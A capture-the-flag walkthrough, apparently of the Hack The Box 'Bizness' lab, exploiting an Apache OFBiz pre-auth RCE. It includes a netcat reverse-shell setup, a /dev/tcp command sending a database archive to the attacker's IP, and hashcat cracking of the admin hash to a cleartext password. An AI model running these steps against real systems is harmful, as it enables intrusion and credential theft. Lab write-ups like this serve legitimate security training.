Bizness
Last updated
Last updated
🔗
🎯 Target IP: 10.129.237.34
Create a directory on the Desktop with the machine's name, and inside this directory, create another directory to store the materials and outputs needed to run the machine, including the scans made with nmap.
After this we run the VPN to be able to reach the lab: openvpn htb_vpn.ovpn
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target should be a *nix system, while Windows systems usually have a TTL of 128 secs.
Let's start right away with an active port scan with nmap
sT
TCP connect port scan (Default without root privilege)
sC
Run default scripts
sV
Enumerate versions
vvv
Verbosity
T4
Run a bit faster
oN
Output to file with nmap formatting
It looks like there are 4 open TCP ports on the machine: 22,80,443,45853.
Then, we can proceed to analyze services active on open ports:
Web servers have installed nginx vs 1.18, we can confirm it and know other info using: whatweb bizness.htb command:
Then, go to web server via browser:
Doing a directory enumeration with Dirb tool and checking source page we don't discover others useful thing.
We discover an interesting page that contains login form and the version of ERP:
OFBiz vs is already present into last screen:
Using searchsploit tool we can discover quickly an exploit for this version of Apache OFBiz
search it on google to check potential alternatives and find the relative CVE ID
this CVE is about 2024, so we need to check another CVE for 2023, so google: "ofbiz 18.12 CVE 2023"
and we found a CVE about 2023 on nist site:
Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10. Users are recommended to upgrade to version 18.12.10
Always be careful what you download, open source / github does not mean 100% harmless program
Download files locally using git clone command:
check our attacker box machine IP using ifconfig tun0 go in listening mode using netcat nc -lvnp 1339 and into another shell, go run our exploit spawning a /bin/bash shell
Go to the user home dir using cd ~ and cat the user flag
We can find it into /opt directory
To make our shell interactive and more usable run this command: python3 -c 'import pty;pty.spawn("/bin/bash")'
and start to search into a configuration files the hashing algorithm used.
there's an interesting file at the path: /opt/ofbiz/framework/security/config that contains the answer:
Search directory that regards database among the folders regarding data.
We found an interesting file at the path: /opt/ofbiz/runtime/data/derby/derby.log that contains db logs with correspective db name and its version
Navigating into folders there's an interesting file at path: /opt/ofbiz/runtime/data/derby/ofbiz/seg0 with more files .dat
Search into them if there's an 'admin' string using this command: grep -a -l 'admin.$' *.dat to search only interesting files that should contains sensitive administrative strings
and into file called: c6650.dat we found this value: admin$"$SHA$$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
ij command-line utility, what is the command within ij to connect to a database stored in ./ofbiz?Maybe, I've already gone too far with the previous question.
ij utility seems be not present into these machine, so we can transfer .dat files and install ij utility on our kali attacker machine.
Archive file using: tar cvf /dev/shm/derby.tar derby
Transfer derby files to attacker machine:
Go in listening mode on attacker machine: nc -lvnp 4433 > derby.tar
Send file via netcat: cat /dev/shm/derby.tar > /dev/tcp/10.10.17.177/4433
Now we've a db on attacker machine, unzip the db archieve using: tar -xvf derby.tar
and we can install ij to connect db:
In my case i've add an additional flag 'true' to to start the connection correctly.
admin user?Querying db we can discover the table that cotnains the SHA-1 hash of the admin user:
That's of course the same that we already know: $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
We know that the psw hash: $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I is in SHA1-based format
$SHA$: This indicates the use of the SHA-1 hashing algorithm.
d: This is the salt used in the hashing process.
uP0_QaVBpDWFeo8-dRzDqRwXQ2I: This is the Base64 URL-encoded hash. After decoding, this represents the actual hash value.
Decoding the Base64 URL-encoded String
base64 -d: This decodes the Base64 URL-encoded string.
xxd -p: This converts the decoded bytes into a plain hexadecimal format. We need the hexadecimal version of the hash to use it in hashcat.
This generates a file hash.txt containing the decoded hash in hexadecimal format.
At this point, we have the decoded hash and we know the salt (d). However, hashcat expects the input hash to be in the format: <hash>:<salt>
Now, we can proceeding to cracking hash using hashcat, using the -m 120 thatcorresponds to the hashing algorithm sha1($salt.$pass)
obtaining our psw in cleartext: b8fd3f41a541a435857a8f3e751cc3a91c174362:d:monkeybizness
Finally, we know the admin password and we can access using sudo command: su -
There's a PoC to exploit it on github: that contains all which we need: PoC and ysoserial-all.jar tool
